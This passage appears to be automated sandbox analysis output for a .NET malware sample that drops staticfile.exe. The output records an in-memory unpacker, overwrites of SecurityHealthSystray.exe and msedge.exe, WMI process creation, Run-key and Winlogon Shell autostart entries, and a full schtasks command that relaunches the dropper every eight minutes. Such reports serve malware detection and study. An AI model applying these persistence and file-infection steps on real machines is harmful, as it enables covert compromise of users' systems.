                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: wbemcomn.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: winmmbase.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: mmdevapi.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: devobj.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: ksuser.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: avrt.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: audioses.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: powrprof.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: umpdc.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: msacm32.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeSection loaded: midimap.dll
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: ArELGBzuuF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: ArELGBzuuF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\kdqn3ul3\kdqn3ul3.pdb source: ArELGBzuuF.exe, 00000000.00000002.2053915585.0000000002B77000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\sxun3xbz\sxun3xbz.pdb source: ArELGBzuuF.exe, 00000000.00000002.2053915585.0000000002B77000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: ArELGBzuuF.exe, 1a2.cs.Net Code: ghM System.Reflection.Assembly.Load(byte[])
                Source: ArELGBzuuF.exe, 1a2.cs.Net Code: ghM System.Reflection.Assembly.Load(byte[])
                Source: ArELGBzuuF.exe, 857.cs.Net Code: _736
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kdqn3ul3\kdqn3ul3.cmdline"
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sxun3xbz\sxun3xbz.cmdline"
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kdqn3ul3\kdqn3ul3.cmdline"Jump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sxun3xbz\sxun3xbz.cmdline"Jump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeCode function: 0_2_00007FF848F13CB9 push ebx; retf 0_2_00007FF848F13CBA
                Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 8_2_00007FF848F13CB9 push ebx; retf 8_2_00007FF848F13CBA
                Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 9_2_00007FF848F33CB9 push ebx; retf 9_2_00007FF848F33CBA
                Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 17_2_00007FF848F13CB9 push ebx; retf 17_2_00007FF848F13CBA
                Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 18_2_00007FF848F43CB9 push ebx; retf 18_2_00007FF848F43CBA
                Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 20_2_00007FF848F33CB9 push ebx; retf 20_2_00007FF848F33CBA
                Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 21_2_00007FF848F33CB9 push ebx; retf 21_2_00007FF848F33CBA
                Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 22_2_00007FF848F2064A pushad ; retn 48FCh22_2_00007FF848F209B9
                Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 22_2_00007FF848F2A6D8 push E95F13AFh; ret 22_2_00007FF848F2A6F9

                Persistence and Installation Behavior

                barindex
                Creates processes via WMI
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Infects executable files (exe, dll, sys, html)
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeFile created: C:\Users\user\AppData\Local\staticfile.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file

                Boot Survival

                barindex
                Creates an undocumented autostart registry key
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "staticfiles" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Local\staticfile.exe'" /f
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run staticfileJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run staticfileJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run staticfileJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run staticfileJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information set: NOOPENFILEERRORBOX
